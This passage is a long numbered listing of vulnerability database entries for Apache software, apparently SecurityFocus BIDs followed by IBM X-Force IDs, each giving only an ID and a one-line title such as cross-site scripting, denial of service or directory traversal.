15127| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
15128| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
15129| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
15130| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
15131| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
15132| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
15133| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
15134| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
15135| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
15136| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
15137| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
15138| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
15139| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
15140| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
15141| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
15142| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
15143| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
15144| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
15145| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
15146| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
15147| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
15148| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
15149| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
15150| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
15151| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
15152| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
15153| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
15154| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
15155| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
15156| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
15157| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
15158| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
15159| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
15160| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
15161| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
15162| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
15163| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
15164| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
15165| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
15166| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
15167| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
15168| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
15169| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
15170| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
15171| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
15172| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
15173| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
15174| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
15175| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
15176| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
15177| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
15178| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
15179| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
15180| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
15181| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
15182| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
15183| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
15184| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
15185| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
15186| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
15187| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
15188| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
15189| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
15190| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
15191| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
15192| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
15193| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
15194| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
15195| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
15196| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
15197| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
15198| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
15199| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
15200| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
15201| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
15202| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
15203| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
15204| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
15205| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
15206| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
15207| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
15208| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
15209| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
15210| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
15211| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
15212| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
15213| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
15214| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
15215| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
15216| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
15217| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
15218| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
15219| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
15220| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
15221| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
15222| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
15223| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
15224| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
15225| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
15226| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
15227| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
15228| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
15229| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
15230| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
15231| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
15232| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
15233| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
15234| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
15235| [20527] Apache Mod_TCL Remote Format String Vulnerability
15236| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
15237| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
15238| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
15239| [19106] Apache Tomcat Information Disclosure Vulnerability
15240| [18138] Apache James SMTP Denial Of Service Vulnerability
15241| [17342] Apache Struts Multiple Remote Vulnerabilities
15242| [17095] Apache Log4Net Denial Of Service Vulnerability
15243| [16916] Apache mod_python FileSession Code Execution Vulnerability
15244| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
15245| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
15246| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
15247| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
15248| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
15249| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
15250| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
15251| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
15252| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
15253| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
15254| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
15255| [15177] PHP Apache 2 Local Denial of Service Vulnerability
15256| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
15257| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
15258| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
15259| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
15260| [14106] Apache HTTP Request Smuggling Vulnerability
15261| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
15262| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
15263| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
15264| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
15265| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
15266| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
15267| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
15268| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
15269| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
15270| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
15271| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
15272| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
15273| [11471] Apache mod_include Local Buffer Overflow Vulnerability
15274| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
15275| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
15276| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
15277| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
15278| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
15279| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
15280| [11094] Apache mod_ssl Denial Of Service Vulnerability
15281| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
15282| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
15283| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
15284| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
15285| [10478] ClueCentral Apache Suexec Patch Security Weakness
15286| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
15287| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
15288| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
15289| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
15290| [9921] Apache Connection Blocking Denial Of Service Vulnerability
15291| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
15292| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
15293| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
15294| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
15295| [9733] Apache Cygwin Directory Traversal Vulnerability
15296| [9599] Apache mod_php Global Variables Information Disclosure Weakness
15297| [9590] Apache-SSL Client Certificate Forging Vulnerability
15298| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
15299| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
15300| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
15301| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
15302| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
15303| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
15304| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
15305| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
15306| [8898] Red Hat Apache Directory Index Default Configuration Error
15307| [8883] Apache Cocoon Directory Traversal Vulnerability
15308| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
15309| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
15310| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
15311| [8707] Apache htpasswd Password Entropy Weakness
15312| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
15313| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
15314| [8226] Apache HTTP Server Multiple Vulnerabilities
15315| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
15316| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
15317| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
15318| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
15319| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
15320| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
15321| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
15322| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
15323| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
15324| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
15325| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
15326| [7255] Apache Web Server File Descriptor Leakage Vulnerability
15327| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
15328| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
15329| [6939] Apache Web Server ETag Header Information Disclosure Weakness
15330| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
15331| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
15332| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
15333| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
15334| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
15335| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
15336| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
15337| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
15338| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
15339| [6117] Apache mod_php File Descriptor Leakage Vulnerability
15340| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
15341| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
15342| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
15343| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
15344| [5992] Apache HTDigest Insecure Temporary File Vulnerability
15345| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
15346| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
15347| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
15348| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
15349| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
15350| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
15351| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
15352| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
15353| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
15354| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
15355| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
15356| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
15357| [5485] Apache 2.0 Path Disclosure Vulnerability
15358| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
15359| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
15360| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
15361| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
15362| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
15363| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
15364| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
15365| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
15366| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
15367| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
15368| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
15369| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
15370| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
15371| [4437] Apache Error Message Cross-Site Scripting Vulnerability
15372| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
15373| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
15374| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
15375| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
15376| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
15377| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
15378| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
15379| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
15380| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
15381| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
15382| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
15383| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
15384| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
15385| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
15386| [3596] Apache Split-Logfile File Append Vulnerability
15387| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
15388| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
15389| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
15390| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
15391| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
15392| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
15393| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
15394| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
15395| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
15396| [3169] Apache Server Address Disclosure Vulnerability
15397| [3009] Apache Possible Directory Index Disclosure Vulnerability
15398| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
15399| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
15400| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
15401| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
15402| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
15403| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
15404| [2216] Apache Web Server DoS Vulnerability
15405| [2182] Apache /tmp File Race Vulnerability
15406| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
15407| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
15408| [1821] Apache mod_cookies Buffer Overflow Vulnerability
15409| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
15410| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
15411| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
15412| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
15413| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
15414| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
15415| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
15416| [1457] Apache::ASP source.asp Example Script Vulnerability
15417| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
15418| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
15419|
15420| IBM X-Force - https://exchange.xforce.ibmcloud.com:
15421| [86258] Apache CloudStack text fields cross-site scripting
15422| [85983] Apache Subversion mod_dav_svn module denial of service
15423| [85875] Apache OFBiz UEL code execution
15424| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
15425| [85871] Apache HTTP Server mod_session_dbd unspecified
15426| [85756] Apache Struts OGNL expression command execution
15427| [85755] Apache Struts DefaultActionMapper class open redirect
15428| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
15429| [85574] Apache HTTP Server mod_dav denial of service
15430| [85573] Apache Struts Showcase App OGNL code execution
15431| [85496] Apache CXF denial of service
15432| [85423] Apache Geronimo RMI classloader code execution
15433| [85326] Apache Santuario XML Security for C++ buffer overflow
15434| [85323] Apache Santuario XML Security for Java spoofing
15435| [85319] Apache Qpid Python client SSL spoofing
15436| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
15437| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
15438| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
15439| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
15440| [84952] Apache Tomcat CVE-2012-3544 denial of service
15441| [84763] Apache Struts CVE-2013-2135 security bypass
15442| [84762] Apache Struts CVE-2013-2134 security bypass
15443| [84719] Apache Subversion CVE-2013-2088 command execution
15444| [84718] Apache Subversion CVE-2013-2112 denial of service
15445| [84717] Apache Subversion CVE-2013-1968 denial of service
15446| [84577] Apache Tomcat security bypass
15447| [84576] Apache Tomcat symlink
15448| [84543] Apache Struts CVE-2013-2115 security bypass
15449| [84542] Apache Struts CVE-2013-1966 security bypass
15450| [84154] Apache Tomcat session hijacking
15451| [84144] Apache Tomcat denial of service
15452| [84143] Apache Tomcat information disclosure
15453| [84111] Apache HTTP Server command execution
15454| [84043] Apache Virtual Computing Lab cross-site scripting
15455| [84042] Apache Virtual Computing Lab cross-site scripting
15456| [83782] Apache CloudStack information disclosure
15457| [83781] Apache CloudStack security bypass
15458| [83720] Apache ActiveMQ cross-site scripting
15459| [83719] Apache ActiveMQ denial of service
15460| [83718] Apache ActiveMQ denial of service
15461| [83263] Apache Subversion denial of service
15462| [83262] Apache Subversion denial of service
15463| [83261] Apache Subversion denial of service
15464| [83259] Apache Subversion denial of service
15465| [83035] Apache mod_ruid2 security bypass
15466| [82852] Apache Qpid federation_tag security bypass
15467| [82851] Apache Qpid qpid::framing::Buffer denial of service
15468| [82758] Apache Rave User RPC API information disclosure
15469| [82663] Apache Subversion svn_fs_file_length() denial of service
15470| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
15471| [82641] Apache Qpid AMQP denial of service
15472| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
15473| [82618] Apache Commons FileUpload symlink
15474| [82360] Apache HTTP Server manager interface cross-site scripting
15475| [82359] Apache HTTP Server hostnames cross-site scripting
15476| [82338] Apache Tomcat log/logdir information disclosure
15477| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
15478| [82268] Apache OpenJPA deserialization command execution
15479| [81981] Apache CXF UsernameTokens security bypass
15480| [81980] Apache CXF WS-Security security bypass
15481| [81398] Apache OFBiz cross-site scripting
15482| [81240] Apache CouchDB directory traversal
15483| [81226] Apache CouchDB JSONP code execution
15484| [81225] Apache CouchDB Futon user interface cross-site scripting
15485| [81211] Apache Axis2/C SSL spoofing
15486| [81167] Apache CloudStack DeployVM information disclosure
15487| [81166] Apache CloudStack AddHost API information disclosure
15488| [81165] Apache CloudStack createSSHKeyPair API information disclosure
15489| [80518] Apache Tomcat cross-site request forgery security bypass
15490| [80517] Apache Tomcat FormAuthenticator security bypass
15491| [80516] Apache Tomcat NIO denial of service
15492| [80408] Apache Tomcat replay-countermeasure security bypass
15493| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
15494| [80317] Apache Tomcat slowloris denial of service
15495| [79984] Apache Commons HttpClient SSL spoofing
15496| [79983] Apache CXF SSL spoofing
15497| [79830] Apache Axis2/Java SSL spoofing
15498| [79829] Apache Axis SSL spoofing
15499| [79809] Apache Tomcat DIGEST security bypass
15500| [79806] Apache Tomcat parseHeaders() denial of service
15501| [79540] Apache OFBiz unspecified
15502| [79487] Apache Axis2 SAML security bypass
15503| [79212] Apache Cloudstack code execution
15504| [78734] Apache CXF SOAP Action security bypass
15505| [78730] Apache Qpid broker denial of service
15506| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
15507| [78563] Apache mod_pagespeed module unspecified cross-site scripting
15508| [78562] Apache mod_pagespeed module security bypass
15509| [78454] Apache Axis2 security bypass
15510| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
15511| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
15512| [78321] Apache Wicket unspecified cross-site scripting
15513| [78183] Apache Struts parameters denial of service
15514| [78182] Apache Struts cross-site request forgery
15515| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
15516| [77987] mod_rpaf module for Apache denial of service
15517| [77958] Apache Struts skill name code execution
15518| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
15519| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
15520| [77568] Apache Qpid broker security bypass
15521| [77421] Apache Libcloud spoofing
15522| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
15523| [77046] Oracle Solaris Apache HTTP Server information disclosure
15524| [76837] Apache Hadoop information disclosure
15525| [76802] Apache Sling CopyFrom denial of service
15526| [76692] Apache Hadoop symlink
15527| [76535] Apache Roller console cross-site request forgery
15528| [76534] Apache Roller weblog cross-site scripting
15529| [76152] Apache CXF elements security bypass
15530| [76151] Apache CXF child policies security bypass
15531| [75983] MapServer for Windows Apache file include
15532| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
15533| [75558] Apache POI denial of service
15534| [75545] PHP apache_request_headers() buffer overflow
15535| [75302] Apache Qpid SASL security bypass
15536| [75211] Debian GNU/Linux apache 2 cross-site scripting
15537| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
15538| [74871] Apache OFBiz FlexibleStringExpander code execution
15539| [74870] Apache OFBiz multiple cross-site scripting
15540| [74750] Apache Hadoop unspecified spoofing
15541| [74319] Apache Struts XSLTResult.java file upload
15542| [74313] Apache Traffic Server header buffer overflow
15543| [74276] Apache Wicket directory traversal
15544| [74273] Apache Wicket unspecified cross-site scripting
15545| [74181] Apache HTTP Server mod_fcgid module denial of service
15546| [73690] Apache Struts OGNL code execution
15547| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
15548| [73100] Apache MyFaces in directory traversal
15549| [73096] Apache APR hash denial of service
15550| [73052] Apache Struts name cross-site scripting
15551| [73030] Apache CXF UsernameToken security bypass
15552| [72888] Apache Struts lastName cross-site scripting
15553| [72758] Apache HTTP Server httpOnly information disclosure
15554| [72757] Apache HTTP Server MPM denial of service
15555| [72585] Apache Struts ParameterInterceptor security bypass
15556| [72438] Apache Tomcat Digest security bypass
15557| [72437] Apache Tomcat Digest security bypass
15558| [72436] Apache Tomcat DIGEST security bypass
15559| [72425] Apache Tomcat parameter denial of service
15560| [72422] Apache Tomcat request object information disclosure
15561| [72377] Apache HTTP Server scoreboard security bypass
15562| [72345] Apache HTTP Server HTTP request denial of service
15563| [72229] Apache Struts ExceptionDelegator command execution
15564| [72089] Apache Struts ParameterInterceptor directory traversal
15565| [72088] Apache Struts CookieInterceptor command execution
15566| [72047] Apache Geronimo hash denial of service
15567| [72016] Apache Tomcat hash denial of service
15568| [71711] Apache Struts OGNL expression code execution
15569| [71654] Apache Struts interfaces security bypass
15570| [71620] Apache ActiveMQ failover denial of service
15571| [71617] Apache HTTP Server mod_proxy module information disclosure
15572| [71508] Apache MyFaces EL security bypass
15573| [71445] Apache HTTP Server mod_proxy security bypass
15574| [71203] Apache Tomcat servlets privilege escalation
15575| [71181] Apache HTTP Server ap_pregsub() denial of service
15576| [71093] Apache HTTP Server ap_pregsub() buffer overflow
